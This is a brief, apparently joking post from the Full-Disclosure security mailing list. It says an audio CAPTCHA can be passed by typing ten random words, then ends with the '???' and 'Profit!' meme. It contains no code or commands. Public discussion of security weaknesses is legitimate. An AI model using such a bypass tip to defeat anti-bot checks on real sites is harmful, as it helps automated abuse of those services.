 1. Select Audio Captcha
 2. Type in ten random words and submit
 3. ???
 4. Profit!


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/